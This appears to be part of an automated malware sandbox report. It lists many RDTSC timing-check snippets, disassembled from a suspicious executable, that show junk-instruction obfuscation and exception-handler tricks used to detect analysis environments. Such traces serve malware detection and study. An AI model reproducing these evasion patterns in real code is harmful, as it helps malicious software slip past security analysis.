Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9884C second address: C98851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C98851 second address: C98857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C98857 second address: C9886E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F8AF15A7F68h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F8AF15A7F56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9886E second address: C98872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9B85F second address: C9B86D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F8AF15A7F56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9B86D second address: C9B894 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F8AF10CF437h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9B894 second address: C9B89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9C7D6 second address: C9C7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9BA43 second address: C9BA4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9A888 second address: C9A88E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9BA4D second address: C9BAF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8AF15A7F5Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jc 00007F8AF15A7F57h 0x00000012 clc 0x00000013 push dword ptr fs:[00000000h] 0x0000001a movsx ebx, di 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F8AF15A7F58h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov ebx, 395FDE54h 0x00000043 mov bx, D7C4h 0x00000047 mov eax, dword ptr [ebp+122D0729h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F8AF15A7F58h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000018h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 sub edi, dword ptr [ebp+122DBA7Ch] 0x0000006d call 00007F8AF15A7F65h 0x00000072 mov ebx, 59A81FE1h 0x00000077 pop edi 0x00000078 push FFFFFFFFh 0x0000007a sub dword ptr [ebp+122D369Eh], esi 0x00000080 push eax 0x00000081 pushad 0x00000082 push eax 0x00000083 push edx 0x00000084 jng 00007F8AF15A7F56h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9A88E second address: C9A941 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8AF10CF434h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12455374h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F8AF10CF428h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 add bx, 6ED1h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 or ebx, 1F028960h 0x00000047 mov eax, dword ptr [ebp+122D1119h] 0x0000004d jmp 00007F8AF10CF432h 0x00000052 mov dword ptr [ebp+122D1B79h], edx 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007F8AF10CF428h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 0000001Ch 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 push ebx 0x00000075 mov dword ptr [ebp+122D2834h], esi 0x0000007b pop edi 0x0000007c push eax 0x0000007d push edi 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9D9F5 second address: C9D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9D9FB second address: C9DA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9E88C second address: C9E891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9E891 second address: C9E8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8AF10CF426h 0x00000009 jmp 00007F8AF10CF436h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8AF10CF434h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA1F7C second address: CA1F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA1F80 second address: CA1F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2EAB second address: CA2EC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F8AF15A7F58h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2EC5 second address: CA2EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2EC9 second address: CA2ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2ECF second address: CA2F30 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8AF10CF42Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1EFFh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F8AF10CF428h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F8AF10CF430h 0x00000032 mov ebx, 166EF59Eh 0x00000037 push 00000000h 0x00000039 mov ebx, dword ptr [ebp+122D38C3h] 0x0000003f push eax 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2F30 second address: CA2F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA2F34 second address: CA2F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA3072 second address: CA3076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA3076 second address: CA307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA40F2 second address: CA4123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8AF15A7F63h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA4FF3 second address: CA4FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA3148 second address: CA314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA314C second address: CA3160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA5F55 second address: CA5F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA0FA9 second address: CA0FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8AF10CF426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CA0FB4 second address: CA102F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8AF15A7F5Ah 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F8AF15A7F58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D3963h] 0x0000002e sub ebx, dword ptr [ebp+122D39CFh] 0x00000034 push dword ptr fs:[00000000h] 0x0000003b or dword ptr [ebp+1247EECAh], esi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov ebx, esi 0x0000004a mov eax, dword ptr [ebp+122D1701h] 0x00000050 jmp 00007F8AF15A7F5Ch 0x00000055 push FFFFFFFFh 0x00000057 push eax 0x00000058 pushad 0x00000059 jmp 00007F8AF15A7F5Ah 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CAF3B0 second address: CAF3E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF10CF438h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8AF10CF42Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CB9FDD second address: CB9FF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8AF15A7F56h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F8AF15A7F5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4F7FB second address: C4F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8AF10CF426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4F805 second address: C4F823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8AF15A7F69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4F823 second address: C4F851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F8AF10CF44Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8AF10CF433h 0x0000001a je 00007F8AF10CF426h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC2780 second address: CC2784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC28F7 second address: CC28FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC28FB second address: CC290C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC290C second address: CC2920 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8AF10CF426h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7945 second address: CC7954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8AF15A7F56h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7954 second address: CC795A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC795A second address: CC795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC795F second address: CC7971 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7971 second address: CC7977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7AD3 second address: CC7AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7AD7 second address: CC7AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7C9D second address: CC7CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CC7DE0 second address: CC7DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C93E30 second address: C70EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, 7910D0A4h 0x0000000e lea eax, dword ptr [ebp+1248DBC5h] 0x00000014 clc 0x00000015 nop 0x00000016 jmp 00007F8AF10CF430h 0x0000001b push eax 0x0000001c jc 00007F8AF10CF42Eh 0x00000022 jng 00007F8AF10CF428h 0x00000028 push esi 0x00000029 pop esi 0x0000002a nop 0x0000002b jmp 00007F8AF10CF438h 0x00000030 jc 00007F8AF10CF42Bh 0x00000036 mov edi, 35E45866h 0x0000003b call dword ptr [ebp+122D1E01h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F8AF10CF435h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C94441 second address: C94446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C94446 second address: C9444C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9444C second address: C9448B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007F8AF15A7F56h 0x00000011 jc 00007F8AF15A7F56h 0x00000017 popad 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F8AF15A7F67h 0x00000022 mov eax, dword ptr [eax] 0x00000024 js 00007F8AF15A7F5Eh 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9448B second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jg 00007F8AF10CF435h 0x0000000f pop eax 0x00000010 sub dword ptr [ebp+122D3573h], edx 0x00000016 call 00007F8AF10CF429h 0x0000001b jng 00007F8AF10CF430h 0x00000021 push eax 0x00000022 jng 00007F8AF10CF445h 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c pushad 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C944F9 second address: C94528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jbe 00007F8AF15A7F56h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 jg 00007F8AF15A7F5Ah 0x00000016 push ebx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F8AF15A7F5Dh 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C94528 second address: C9452D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9458F second address: C9459A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8AF15A7F56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C94901 second address: C94928 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8AF10CF438h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C94928 second address: C9492E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9511C second address: C95137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C95137 second address: C71B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, 4A8Ah 0x00000010 call dword ptr [ebp+122D2743h] 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jmp 00007F8AF15A7F60h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C71B41 second address: C71B83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8AF10CF43Eh 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F8AF10CF435h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDA1 second address: CCBDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F8AF15A7F58h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDB1 second address: CCBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDB7 second address: CCBDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8AF15A7F56h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F8AF15A7F56h 0x00000015 jnp 00007F8AF15A7F56h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDD9 second address: CCBDE9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 jno 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDE9 second address: CCBDEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBDEF second address: CCBE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCBF5D second address: CCBF6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8AF15A7F56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCC0E3 second address: CCC0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F8AF10CF426h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C944C3 second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F8AF15A7F75h 0x0000000d jg 00007F8AF15A7F6Fh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCC358 second address: CCC35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCC35C second address: CCC369 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CCC61D second address: CCC625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
